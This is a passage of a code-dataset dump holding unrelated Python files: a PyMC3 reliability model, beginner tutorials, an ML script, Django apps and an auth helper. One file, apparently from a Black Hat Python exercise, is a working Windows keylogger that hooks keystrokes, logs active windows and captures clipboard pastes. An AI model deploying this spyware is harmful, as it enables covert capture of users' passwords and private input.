fault rates into rows of 6, giving a 21 x 6 array\nelec_faults2 = np.array([elec_faults[i*6:(i+1)*6] for i in np.arange(21)])\nelec_year2 = np.array([elec_year[i*6:(i+1)*6] for i in np.arange(21)])\nelec_char1 = np.array([elec_Pca_char1[i*6:(i+1)*6] for i in np.arange(21)])\nelec_char2 = np.array([elec_Pca_char2[i*6:(i+1)*6] for i in np.arange(21)])\ncompanyABC2 = np.array([companyABC[i*6:(i+1)*6] for i in np.arange(21)])\n\n# shared (theano) variables\nxs_char1 = shared(np.asarray(elec_Pca_char1))\nxs_char2 = shared(np.asarray(elec_Pca_char2))\n\nys_faults = shared(np.asarray(elec_faults))\nxs_year = shared(np.asarray(data_cs_year))\nNum_shared = shared(np.asarray(companyABC))\n# plotting\n# Plot_XZ(elec_year2, elec_faults2, Savefig)\n\ndef logit(x):\n    return 1/(1+np.exp(-x))\ndef invlogit(x):\n    return tt.exp(x)/(1+tt.exp(x))\ndef Phi(x):\n    # probit transform\n    return 0.5 + 0.5 * pm.math.erf(x/pm.math.sqrt(2))\n\n\n\n\nimport scipy.linalg\ndef alltrue_elemwise(vals):\n    ret = 1\n    for c in vals:\n        ret = ret * (1 * c)\n    return ret\n\ndef alltrue_scalar(vals):\n    return tt.all([tt.all(1 * val) for val in vals])\ndef bound(logp, *conditions, **kwargs):\n    broadcast_conditions = kwargs.get('broadcast_conditions', True)\n\n    if broadcast_conditions:\n        alltrue = alltrue_elemwise\n    else:\n        alltrue = alltrue_scalar\n\n    return tt.switch(alltrue(conditions), logp, -np.inf)\n\n\n
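# Note (added): bound() above and draw_values() below mirror pymc3 3.x\n# internals; get_named_nodes, _draw_value, generate_samples and\n# reshape_sampled are assumed to come from pymc3's distributions module\n# and are never imported in this script.\n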
def draw_values(params, point=None):\n    \"\"\"\n    Draw (fix) parameter values. Handles a number of cases:\n\n    1) The parameter is a scalar\n    2) The parameter is an *RV\n\n        a) parameter can be fixed to the value in the point\n        b) parameter can be fixed by sampling from the *RV\n        c) parameter can be fixed using tag.test_value (last resort)\n\n    3) The parameter is a tensor variable/constant. Can be evaluated using\n    theano.function, but a variable may contain nodes which\n\n        a) are named parameters in the point\n        b) are *RVs with a random method\n\n    \"\"\"\n    # Distribution parameters may be nodes which have named node-inputs\n    # specified in the point. Need to find the node-inputs to replace them.\n    givens = {}\n    for param in params:\n        if hasattr(param, 'name'):\n            named_nodes = get_named_nodes(param)\n            if param.name in named_nodes:\n                named_nodes.pop(param.name)\n            for name, node in named_nodes.items():\n                if not isinstance(node, (tt.sharedvar.SharedVariable,\n                                         tt.TensorConstant)):\n                    givens[name] = (node, pm.distribution._draw_value(node, point=point))\n    values = []\n    for param in params:\n        values.append(_draw_value(param, point=point, givens=givens.values()))\n    return values\n\nclass ZeroInflatedWeibull(pm.Continuous):\n    '''\n    Zero-inflated Weibull log-likelihood.\n    Parameters\n    ----------\n    pi : float\n        Expected proportion of zero observations (0 < pi < 1)\n    alpha : float\n        Weibull shape parameter (alpha > 0)\n    beta : float\n        Weibull scale parameter (beta > 0)\n    '''\n\n    def __init__(self, pi, alpha, beta, *args, **kwargs):\n        super(ZeroInflatedWeibull, self).__init__(*args, **kwargs)\n        self.alpha = alpha = tt.as_tensor_variable(alpha)\n        self.beta = beta = tt.as_tensor_variable(beta)\n        self.pi = pi = tt.as_tensor_variable(pi)\n        self.weib = pm.Weibull.dist(alpha, beta)\n#        self.mode = self.weib.mode\n\n    def random(self, point=None, size=None, repeat=None):\n        alpha, beta, pi = draw_values([self.alpha, self.beta, self.pi],\n                                      point=point)\n        def _random(a, b, size=None):\n            return b * (-np.log(np.random.uniform(size=size)))**(1 / a)\n        g = generate_samples(_random, alpha, beta,\n                             dist_shape=self.shape,\n                             size=size)\n        # keep a draw with probability (1 - pi) and zero it with probability\n        # pi, matching the mixture encoded in logp below\n        sampled = g * (np.random.random(np.squeeze(g.shape)) >= pi)\n        return reshape_sampled(sampled, size, self.shape)\n\n    def logp(self, value):\n        pi = self.pi\n        alpha = self.alpha\n        beta = self.beta\n\n        logp_val = tt.switch(\n            tt.gt(value, 0),\n            tt.log1p(-pi) + self.weib.logp(value),\n            tt.log(pi))\n\n        return bound(\n            logp_val,\n            0 <= value,\n            0 <= pi, pi <= 1,\n            0 < alpha,\n            0 < beta)\n
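\n    # Note (added): the encoded mixture is P(y = 0) = pi and, for y > 0,\n    # density (1 - pi) * Weibull(alpha, beta).pdf(y) -- hence the\n    # log1p(-pi) + weib.logp(value) branch in the switch above.\n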
\n    # def _repr_latex_(self, name=None, dist=None):\n    #     if dist is None:\n    #         dist = self\n    #     alpha = dist.alpha\n    #     beta = dist.beta\n    #     pi = dist.pi\n    #     return r'${} \\sim \\text{{ZeroInflatedWeibull}}(\\mathit{{alpha}}={}, \\mathit{{beta}}={}, \\mathit{{pi}}={})$'.format(name,\n    #         get_variable_name(alpha),\n    #         get_variable_name(beta),\n    #         get_variable_name(pi))\n\n\n# build the model\nwith pm.Model() as model_1:\n    # define priors\n    alpha = pm.HalfCauchy('alpha', 10, testval=.6)\n\n    mu_4 = pm.Normal('mu_4', mu=0, tau=.001)\n    sd_4 = pm.HalfCauchy('sd_4', 10)\n    mu_3 = pm.Normal('mu_3', mu=0, tau=.001)\n    sd_3 = pm.HalfCauchy('sd_3', 10)\n    mu_2 = pm.Normal('mu_2', mu=0, tau=.001)\n    sd_2 = pm.HalfCauchy('sd_2', 10)\n    mu_1 = pm.Normal('mu_1', mu=0, tau=.001)\n    sd_1 = pm.HalfCauchy('sd_1', 10)\n    # mu_0 = pm.Normal('mu_0', mu=0, tau=.001)\n    # sd_0 = pm.HalfCauchy('sd_0', 20)\n    beta4 = pm.Normal('beta4', mu_4, sd_4, shape=companiesABC)\n    beta3 = pm.Normal('beta3', mu_3, sd_3, shape=companiesABC)\n    beta2 = pm.Normal('beta2', mu_2, sd_2, shape=companiesABC)\n    beta1 = pm.Normal('beta1', mu_1, sd_1, shape=companiesABC)\n    beta = pm.Normal('beta', 0, 100)\n    u = pm.Normal('u', 0, 0.01)\n\n    pi_beta = pm.Normal('pi_beta', 0, 100, shape=companiesABC)\n    pi = pm.Deterministic('pi', invlogit(pi_beta[Num_shared]))\n\n    theta = pm.Deterministic('theta', tt.exp(u + beta + \\\n        (beta1[Num_shared] * xs_year + beta2[Num_shared] * xs_char1 + \\\n        beta3[Num_shared] * xs_char2 + beta4[Num_shared] * xs_year * xs_year)))\n\n    Observed = ZeroInflatedWeibull(\"Observed\", pi=pi, alpha=alpha, beta=theta, observed=ys_faults)  # observed data\n    trace_1 = pm.sample(3000)\n\npm.traceplot(trace_1)\nplt.show()\n","repo_name":"Qiuchumo/QW_reliable","sub_path":"SCI/12_7ZIW.py","file_name":"12_7ZIW.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"24320178924","text":"# Iterative statements\n# if we want to execute a group of statements multiple times then we should go for iterative statements\n# for loop: if we want to execute some action for every element in a sequence (a string or a collection) then we should go for a for loop\ns=\"no one loves a soldier until the enemy is at the border\"\ni=0\nfor x in s:\n    print(\"the character present at\",i,\"index is:\",x)\n    i=i+1\nfor t in range(10):\n    print(\"surya\")\nfor x in range(11):\n    print(x)\nfor x in range(21):\n    if (x%2!=0):\n        print(x)\nfor x in range(10,0,-1):\n    if (x%2!=0):\n        print(x)\n# to print the sum of numbers present inside a list\nd=eval(input(\"Enter numbers:\"))\nsum=0\nfor x in d:\n    print(\"the sum is\",sum+x)\n    sum=sum+x\n# while loop: if we want to execute a group of statements iteratively until some condition becomes false then we should go for a while loop\nx=1\nwhile x<=10:\n    print(x)\n    x=x+1\n\n# to display the sum of the first n numbers\nn=int(input(\"Enter number:\"))\nsum=0\ni=1\nwhile i<=n:\n    sum=sum+i\n    i=i+1\nprint(\"sum of\",n,\"numbers is:\",sum)","repo_name":"surya-coder/vcs","sub_path":"flowcontrol.py","file_name":"flowcontrol.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"42551828686","text":"import requests\n\nAPI_KEY = \"Your news API_KEY\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nnews_params = {\n    \"qInTitle\": COMPANY_NAME,\n    \"sortBy\": \"relevancy\",\n    \"apiKey\": API_KEY,\n}\n\nresponse = requests.get(url=NEWS_ENDPOINT, params=news_params)\nresponse.raise_for_status()\ndata = response.json()[\"articles\"]\nthree_articles = data[:3]","repo_name":"matteorascioni/python-stock-news-api-sms-alert","sub_path":"news_data.py","file_name":"news_data.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34107270398","text":"import pandas as pd\nimport numpy as np\nimport pickle\n\nfrom sklearn.linear_model import LogisticRegression\n\ndf = pd.read_csv(\"../data/creditcard.csv\")\n\n# Train test split\npos_df = df[df[\"Class\"] == 1]\nneg_df = df[df[\"Class\"] == 0]\nnp.random.seed(5)\n\npos_df[\"group\"] = np.random.randint(0,10, size=pos_df.shape[0])\nneg_df[\"group\"] = np.random.randint(0,10, size=neg_df.shape[0])\n\ntrain = pd.concat([\n    neg_df[neg_df[\"group\"] < 8],\n    pos_df[pos_df[\"group\"] < 8],\n]).sample(frac=1).reset_index(drop=True).drop(columns=[\"group\"])\n\ntest = pd.concat([\n    neg_df[neg_df[\"group\"] >= 8],\n    pos_df[pos_df[\"group\"] >= 8],\n]).sample(frac=1).reset_index(drop=True).drop(columns=[\"group\"])\n\ntrain.to_csv(\"../data/creditcard_train.csv\")\ntest.to_csv(\"../data/creditcard_test.csv\")\n\nX_train = train.drop(columns=[\"Class\"])\nX_test = test.drop(columns=[\"Class\"])\ny_train = train[\"Class\"]\ny_test = test[\"Class\"]\n\n# learning\nlr = LogisticRegression(\n    random_state=0,\n    penalty=\"l2\",\n    C=1.0,\n    solver='liblinear'\n).fit(X_train, y_train)\n\nwith open(\"../model/creditcard_fraud_detection_model.pkl\", \"wb\") as f:\n    pickle.dump(lr, 
f)","repo_name":"marufeuille/ml_with_fc","sub_path":"model_code/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71085085674","text":"#!/usr/bin/python\n# join-mapper.py\nimport sys\nimport xml.etree.ElementTree as xml\n\nPOST_TYPE_ID = 'PostTypeId'\nOWNER_USER_ID = 'OwnerUserId'\nACCEPTED_ANSWER = 'AcceptedAnswerId'\nID = 'Id'\n\nANSWER_TYPE_ID = '2'\n\nQUESTION = 'Q'\nANSWER = 'A'\n\ndef is_answer(post_type): return post_type == ANSWER_TYPE_ID\n\nfor line in sys.stdin:\n content = xml.fromstring(line.strip())\n attributes = content.attrib\n\n\n if is_answer(attributes[POST_TYPE_ID]):\n # Print the answer set\n # Outputs: A \n user_id = attributes.get(OWNER_USER_ID, None)\n answer_id = attributes.get(ID, None)\n\n # Skip results without proper attributes\n if user_id and answer_id:\n print('{0} {1} {2}'.format(answer_id, ANSWER, user_id))\n else:\n sys.stderr.write(\"Could not retrieve name and answer_id.\\n\")\n else:\n # Print the ID of the accepted answer and type\n # Outputs: Q\n accepted_answer_id = attributes.get(ACCEPTED_ANSWER, None)\n\n if accepted_answer_id:\n print('{0} {1}'.format(accepted_answer_id, QUESTION))\n\n\n\n","repo_name":"easyCZ/UoE-Projects","sub_path":"EXC/CW2/task4-3/join-mapper.py","file_name":"join-mapper.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"462706029","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\n\nimport pytest\n\nfrom travel.avia.ticket_daemon.ticket_daemon.lib.utils import fix_flight_number\nfrom travel.avia.ticket_daemon.ticket_daemon.lib.utils import parse_datetime_without_seconds\n\n\n@pytest.mark.parametrize('flight_number,expected_value', [\n ('U6 1', 'U6 1'),\n ('U6 1Д', 'U6 1'),\n ('U6 U61234Д', 'U6 1234'),\n ('F B - FB123Д', 'FB 123'),\n ('РУ 12D', 'РУ 12'),\n ('ФF 12D', 'ФФ 12'),\n ('SU 12345', 'SU 1234'),\n ('СУ 12345', 'СУ 1234'),\n ('UT 535D', 'UT 535'),\n ('ZF 3231a', 'ZF 3231'),\n ('zf 3231a', 'ZF 3231'),\n ('TRA SHcompa- -ny1 233number', None),\n ('99 123', None),\n ('1f 123', '1F 123'),\n ('1я 123', '1Я 123'),\n ('U6 0001', 'U6 1'),\n ('1f 0123', '1F 123'),\n ('1я 0123', '1Я 123'),\n ('SU 0036', 'SU 36'),\n])\ndef test_fix_flight_number(flight_number, expected_value):\n assert fix_flight_number(flight_number, is_charter=False) == expected_value\n\n\n@pytest.mark.parametrize('flight_number,expected_value', [\n ('U6 1', 'U6 1'),\n ('U6 1Д', 'U6 1'),\n ('U6 U61234Д', 'U6 1234'),\n ('F B - FB123Д', 'FB 123'),\n ('РУ 12D', 'РУ 12'),\n ('ФF 12D', 'ФФ 12'),\n ('UT 535D', 'UT 535'),\n ('ZF 3231a', 'ZF 3231'),\n ('SU 12345', 'SU 12345'),\n ('СУ 123456GR', 'СУ 123456'),\n ('YC 939401', 'YC 939401'),\n ('yc 939401', 'YC 939401'),\n ('TRA SHcompa- -ny1 233number', None),\n ('99 123', None),\n ('1f 123', '1F 123'),\n ('1я 123', '1Я 123'),\n ('U6 0001', 'U6 1'),\n ('1f 0123', '1F 123'),\n ('1я 0123', '1Я 123'),\n])\ndef test_fix_flight_number_charter(flight_number, expected_value):\n assert fix_flight_number(flight_number, is_charter=True) == expected_value\n\n\ndef test_parse_datetime_without_seconds():\n actual = parse_datetime_without_seconds('2018-01-21T13:50:59')\n expected = datetime.strptime('2018-01-21T13:50:00', '%Y-%m-%dT%H:%M:%S')\n\n assert actual == 
expected\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/lib/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11414895861","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin.models import LogEntry\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.dispatch import receiver\nfrom django.contrib.admin.models import ADDITION, CHANGE, DELETION\nfrom django.utils import translation\n\n\nfrom app.utils import EnumChoices\nfrom ..market.models import MarketItem\n\n\nclass IncidentTracking(MarketItem):\n\n class Meta:\n proxy = True\n verbose_name = _('incident')\n verbose_name_plural = _('incident tracking')\n\n\nclass UserTracking(get_user_model()):\n \"\"\"\n Proxy model is displayed on the reporting section of admin.\n \"\"\"\n class Meta:\n proxy = True\n verbose_name = _('user tracking')\n verbose_name_plural = _('user tracking')\n\n def get_requests(self):\n return self.marketitem_set.filter(item_type='request')\n\n def get_offers(self):\n return self.marketitem_set.filter(item_type='offer')\n\n\nclass UserActivity(LogEntry):\n ACTION_CHOICES = EnumChoices(\n ADDITION=(ADDITION, _('addition')),\n CHANGE=(CHANGE, _('change')),\n DELETION=(DELETION, _('deletion')),\n LOGGED_IN=(4, _('user logged in')),\n )\n\n def get_action_flag(self):\n return dict(zip(dict(self.ACTION_CHOICES).keys(),\n dict(self.ACTION_CHOICES).values()))[self.action_flag]\n get_action_flag.short_description = _('action flag')\n get_action_flag.admin_order_field = 'action_flag'\n\n class Meta:\n proxy = True\n verbose_name = _('user activity')\n verbose_name_plural = _('user activity')\n\n\n@receiver(user_logged_in)\ndef do_stuff(sender, request, user, **kwargs):\n # set the interface language\n if hasattr(request.user, 'userprofile'):\n translation.activate(request.user.userprofile.interface_lang)\n request.LANGUAGE_CODE = translation.get_language()\n\n UserActivity.objects.log_action(\n user_id=request.user.pk,\n content_type_id=ContentType.objects.get_for_model(user).pk,\n object_id=user.pk,\n object_repr=force_text(user),\n action_flag=UserActivity.ACTION_CHOICES.LOGGED_IN\n )\n","repo_name":"ahguerilla/movements","sub_path":"app/app/reporting/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24604390790","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Site, VpnUsageStat\nfrom .forms import SiteForm\nfrom .utils import get_original_url, traffic_count\nimport requests\nfrom django.http import HttpResponse\n\nfrom django.shortcuts import get_object_or_404\n\n\n@login_required\ndef create_site(request):\n if request.method == 'POST':\n form = SiteForm(request.POST)\n if form.is_valid():\n site = form.save(commit=False)\n site.user_site = request.user\n site.save()\n return redirect('proxy:view_sites')\n else:\n form = SiteForm()\n\n return render(request, 'proxy/create_site.html', {'form': form})\n\n\n@login_required\ndef view_sites(request):\n sites = Site.objects.filter(user_site=request.user)\n 
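# only the requesting user's sites are listed\n    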
return render(request, 'proxy/view_sites.html', {'sites': sites})\n\n@login_required\ndef update_site(request, site_id):\n    site = get_object_or_404(Site, id=site_id, user_site=request.user)\n\n    if request.method == 'POST':\n        form = SiteForm(request.POST, instance=site)\n        if form.is_valid():\n            form.save()\n            return redirect('proxy:view_sites')\n    else:\n        form = SiteForm(instance=site)\n\n    return render(request, 'proxy/update.html', {'form': form, 'site': site})\n\n\n@login_required\ndef site_detail(request, site_id):\n    site = get_object_or_404(Site, id=site_id, user_site=request.user)\n\n    print(\"User:\", request.user)\n    print(\"Site Name:\", site.name)\n\n    vpn_usage_stat = VpnUsageStat.objects.filter(user=request.user, site_name=site.name).first()\n\n    print(\"VpnUsageStat:\", vpn_usage_stat)\n\n    return render(request, 'proxy/detail.html', {'site': site, 'vpn_usage_stat': vpn_usage_stat})\n\n\n@login_required\ndef proxy_view(request, site_name, routes_on_original_site):\n    response = requests.get(routes_on_original_site)\n    soup = get_original_url(response, site_name, routes_on_original_site)\n\n    original_content = response.content\n    modified_content = soup.prettify().encode()\n    original_url = soup.prettify()\n\n    traffic_count(request, site_name, len(original_content), len(modified_content))\n\n    return HttpResponse(original_url, content_type=response.headers['content-type'])\n\n\ndef site_statistics(request):\n    sites_with_stats = []\n\n    user_sites = Site.objects.filter(user_site=request.user)\n\n    for site in user_sites:\n        vpn_stat = VpnUsageStat.objects.filter(user=request.user, site_name=site.name).first()\n        sites_with_stats.append({\n            'site': site,\n            'stat': vpn_stat\n        })\n\n    return render(request, 'proxy/statistics.html', {'sites_with_stats': sites_with_stats})\n","repo_name":"VladRogozin/vpn","sub_path":"vpn/proxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"6751780856","text":"import pandas as pd\nfrom sklearn import cluster, compose, metrics, preprocessing\n\n\nclass Clustering:\n    def __init__(self, target: str) -> None:\n        self.target = target\n        self.contrato_id = None\n        self.nr_documento = None\n        self.preprop_df = self.set_data()\n\n    def set_data(self):\n        df = pd.read_csv(\"data/to_analysis.csv\")\n\n        # preprocessing\n        # drop the proportion columns because of the missing\n        # values they contain\n        prop_columns = [column for column in df.columns if column.startswith(\"prop_\")]\n\n        df.drop(prop_columns, axis=1, inplace=True)\n\n        if self.target == \"dsp\":\n            dspp_columns = [column for column in df.columns if \"dspp\" in column]\n            df.drop(dspp_columns, axis=1, inplace=True)\n            df.dropna(subset=[\"score_dsp\", \"('qtd_transacoes', 'mean')\"], inplace=True)\n        elif self.target == \"dspp\":\n            dsp_columns = [column for column in df.columns if \"dsp\" in column]\n            df.drop(dsp_columns, axis=1, inplace=True)\n            df.dropna(subset=[\"score_dspp\", \"('qtd_transacoes', 'mean')\"], inplace=True)\n\n        self.contrato_id = df[\"contrato_id\"].to_list()\n        self.nr_documento = df[\"nr_documento\"].to_list()\n\n        df.drop([\"contrato_id\", \"nr_documento\"], axis=1, inplace=True)\n\n        return df\n\n    def remove_unused_categories(self) -> None:\n        categorical_variables = self.preprop_df.select_dtypes(include=object).columns\n\n        new_categorical_variables = [\n            feature + \"_new\" for feature in categorical_variables\n        ]\n        df = self.preprop_df.copy()\n\n        
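# collapse multi-valued entries to NaN so dropna() can remove them below\n        for i, 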
feature in enumerate(categorical_variables):\n            df[new_categorical_variables[i]] = df[feature].apply(\n                lambda x: None if len(x.split(\",\")) > 1 else x\n            )\n\n        df.drop(categorical_variables, axis=1, inplace=True)\n        df.dropna(subset=new_categorical_variables, inplace=True)\n\n        self.preprop_df = df.copy()\n\n    def frequency_encoding(self, feature: str):\n        df = self.preprop_df.copy()\n\n        frq_encoder = (df.groupby([feature]).size()) / len(df)\n        df[feature + \"_enc\"] = df[feature].apply(lambda x: frq_encoder[x])\n\n        df.drop([feature], axis=1, inplace=True)\n\n        self.preprop_df = df.copy()\n\n    def create_pipeline(self):\n        categorical_selector = compose.make_column_selector(dtype_include=object)\n        categorical_columns = categorical_selector(self.preprop_df)\n\n        numerical_selector = compose.make_column_selector(dtype_exclude=object)\n        numerical_columns = numerical_selector(self.preprop_df)\n\n        ohe_preprocessor = preprocessing.OneHotEncoder(sparse=False)\n        std_preprocessor = preprocessing.StandardScaler()\n\n        preprocessor = compose.ColumnTransformer(\n            [\n                (\"ohe_preprocessor\", ohe_preprocessor, categorical_columns),\n                (\"std_preprocessor\", std_preprocessor, numerical_columns),\n            ]\n        )\n\n        df_transformed = preprocessor.fit_transform(self.preprop_df)\n\n        clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n        score_lst = []\n        for n_cluster in clusters:\n            cluster_kmeans = cluster.KMeans(n_clusters=n_cluster).fit(df_transformed)\n            preds = cluster_kmeans.predict(df_transformed)\n            # centers = cluster_kmeans.cluster_centers_\n            score = metrics.silhouette_score(df_transformed, preds, metric=\"euclidean\")\n            score_lst.append(score)\n            print(\n                \"For n cluster: {}. The avg silhouette_score is {}\".format(\n                    n_cluster, score\n                )\n            )\n","repo_name":"LucianoBatista/stone-data-challenge","sub_path":"src/clustering_pipeline/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"23494935259","text":"import uuid\nimport asyncpg\nimport secrets\nimport hashlib\n\nimport typing as t\n\nfrom quart import request\nfrom quart import jsonify\nfrom quart import Blueprint\nfrom quart import make_response\n\n\nclass TokenAuthentication():\n\n    def __init__(self):\n        self.valid: str = None\n\n    missing = (401, 'Missing Required URL Parameter: key')\n    invalid = (401, 'Invalid Request Authorization Token')\n\n\n    def verify(self, key: str) -> bool:\n        encrypted = hashlib.sha256(key.encode('UTF-8'))\n        comparable = encrypted.hexdigest()\n\n        return comparable == self.valid\n\n    @classmethod\n    def generate_user(cls) -> str:\n        unique = uuid.uuid4()\n\n        return unique.hex\n\n    @classmethod\n    def generate_secret(cls) -> str:\n        return secrets.token_hex(12)\n\n    @classmethod\n    def generate_key(cls) -> t.Tuple[str, str]:\n        decrypted = secrets.token_urlsafe(24)\n\n        encrypted = hashlib.sha256(decrypted.encode('UTF-8'))\n        storable = encrypted.hexdigest()\n\n        return decrypted, storable\n
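\n    # Note (added): only the sha256 hex digest ('storable') is persisted;\n    # the URL-safe token is handed out once and later checked via verify().\n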
\n    async def fetch_key(self, user: dict) -> t.Optional[bool]:\n        try:\n            conn = await asyncpg.connect(\n                host = '192.168.1.74',\n                port = 5432,\n                database = 'Authentication',\n\n                user = user['client-id'],\n                password = user['client-secret']\n            )\n        except Exception as e:\n            return False\n\n        query = (\n            ' SELECT * FROM \"Registration\" '\n            ' WHERE \"Application ID\" = $1 AND \"Status\" = $2'\n        )\n\n        data = await conn.fetchrow(query, user['client-id'], True)\n        await conn.close()\n\n        if not data:\n            return False\n\n        self.valid = data['Access Key']\n\n\nclass UserAuthentication():\n\n    missing = (401, 'Missing Required Request Headers')\n\n    invalid = (401, 'Invalid Request Authorization Credentials')\n\n    @staticmethod\n    def get_user(request: request) -> dict:\n        try:\n            user = {\n                'client-id': request.headers['client-id'],\n                'client-secret': request.headers['client-secret']\n            }\n        except KeyError as e:\n            return False\n\n        return user\n","repo_name":"Savant-Dev/SavantAPI","sub_path":"api/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"14470579841","text":"first = \"Brian\"\nlast = \"Parker\"\n\n# we can do this to concat strings\nfull = first + \" \" + last\nprint(full)\n\n# this is a better way, called formatted strings\n# what we have between curly braces will be replaced at run time\nfull = f\"{first} {last}\"\nprint(full)\n\n# you can put any valid expressions between {}\n\nfull = f\"{len(first)} {2 + 2}\"\nprint(full)","repo_name":"btparker70/Python-Basics","sub_path":"basics/formattedStrings.py","file_name":"formattedStrings.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"6206162866","text":"from ctypes import byref, create_string_buffer, c_ulong, windll\nfrom io import StringIO\n\nimport os\nimport pythoncom\nimport pyWinhook as pyHook\nimport sys\nimport time\nimport win32clipboard\n\nTIMEOUT = 60*10\n\n# Windows-only logger\n\n\nclass KeyLogger:\n    def __init__(self) -> None:\n        self.current_window = None\n\n    def get_current_process(self):\n        # get current window handle\n        hwnd = windll.user32.GetForegroundWindow()\n        pid = c_ulong(0)\n        # get process id for current window\n        windll.user32.GetWindowThreadProcessId(hwnd, byref(pid))\n        process_id = f'{pid.value}'\n\n        executable = create_string_buffer(512)\n        h_process = windll.kernel32.OpenProcess(0x400 | 0x10, False, pid)\n\n        # get executable name for process id\n        windll.psapi.GetModuleBaseNameA(\n            h_process, None, byref(executable), 512)\n        window_title = create_string_buffer(512)\n\n        # get window title text\n        windll.user32.GetWindowTextA(hwnd, byref(window_title), 512)\n\n        try:\n            self.current_window = window_title.value.decode()\n        except UnicodeDecodeError as e:\n            print(f\"{e}: window name unknown\")\n\n        print(\"\\n\", process_id, executable.value.decode(), self.current_window)\n\n        windll.kernel32.CloseHandle(hwnd)\n        windll.kernel32.CloseHandle(h_process)\n\n    # key-press handler\n    def mykeystroke(self, event):\n\n        # print(f\"event.WindowName: {event.WindowName} self.current_window: {self.current_window}\")\n        if event.WindowName != self.current_window:\n            self.get_current_process()\n        if 32 < event.Ascii < 127:\n            print(chr(event.Ascii), end='')\n        else:\n            if event.Key == 'V':\n                win32clipboard.OpenClipboard()\n                value = win32clipboard.GetClipboardData()\n                win32clipboard.CloseClipboard()\n                print(f\"[PASTE] - {value}\")\n            else:\n                print(f\"{event.Key}\")\n        return True\n\n# actual main method\n\n\ndef run():\n    save_stdout = sys.stdout\n    # redirect the whole output to an in-memory buffer\n    # disabled for testing\n    # sys.stdout = StringIO()\n\n    kl = KeyLogger()\n    hm = pyHook.HookManager()\n\n    # set handler\n    hm.KeyDown = kl.mykeystroke\n    hm.HookKeyboard()\n\n    while time.thread_time() < TIMEOUT:\n        pythoncom.PumpWaitingMessages()\n    log = sys.stdout.getvalue()\n    sys.stdout = save_stdout\n    return log\n\n\nif __name__ 
== '__main__':\n print(run())\n print(\"done.\")\n","repo_name":"vlad2010/Black_Hat_Python","sub_path":"keylog.py","file_name":"keylog.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216744349","text":"from __future__ import absolute_import, division, unicode_literals\n\nfrom datetime import datetime, timedelta\nfrom sqlalchemy.sql import func\n\nfrom changes.api.base import APIView\nfrom changes.config import db\nfrom changes.constants import Result, Status\nfrom changes.models.build import Build\nfrom changes.models.job import Job\nfrom changes.models.jobstep import JobStep\n\n\nclass SystemStatsAPIView(APIView):\n def _get_status_counts(self, cutoff):\n excluded = [Status.finished, Status.collecting_results, Status.unknown]\n\n build_stats = dict(db.session.query(\n Build.status,\n func.count(),\n ).filter(\n Build.date_created >= cutoff,\n ~Build.status.in_(excluded),\n ).group_by(\n Build.status,\n ))\n\n job_stats = dict(db.session.query(\n Job.status,\n func.count(),\n ).filter(\n Job.date_created >= cutoff,\n ~Job.status.in_(excluded),\n ).group_by(\n Job.status,\n ))\n\n jobstep_stats = dict(db.session.query(\n JobStep.status,\n func.count(),\n ).filter(\n JobStep.date_created >= cutoff,\n ~JobStep.status.in_(excluded),\n ).group_by(\n JobStep.status,\n ))\n\n context = []\n for status in Status.__members__.values():\n if status in excluded:\n continue\n\n if status == Status.pending_allocation:\n name = 'Pending Allocation'\n else:\n name = unicode(status)\n\n context.append({\n 'name': name,\n 'numBuilds': build_stats.get(status, 0),\n 'numJobs': job_stats.get(status, 0),\n 'numJobSteps': jobstep_stats.get(status, 0),\n })\n\n return context\n\n def _get_result_counts(self, cutoff):\n build_stats = dict(db.session.query(\n Build.result,\n func.count(),\n ).filter(\n Build.date_created >= cutoff,\n Build.status == Status.finished,\n Build.result != Result.unknown,\n ).group_by(\n Build.result,\n ))\n\n job_stats = dict(db.session.query(\n Job.result,\n func.count(),\n ).filter(\n Job.date_created >= cutoff,\n Job.status == Status.finished,\n Job.result != Result.unknown,\n ).group_by(\n Job.result,\n ))\n\n jobstep_stats = dict(db.session.query(\n JobStep.result,\n func.count(),\n ).filter(\n JobStep.date_created >= cutoff,\n JobStep.status == Status.finished,\n JobStep.result != Result.unknown,\n ).group_by(\n 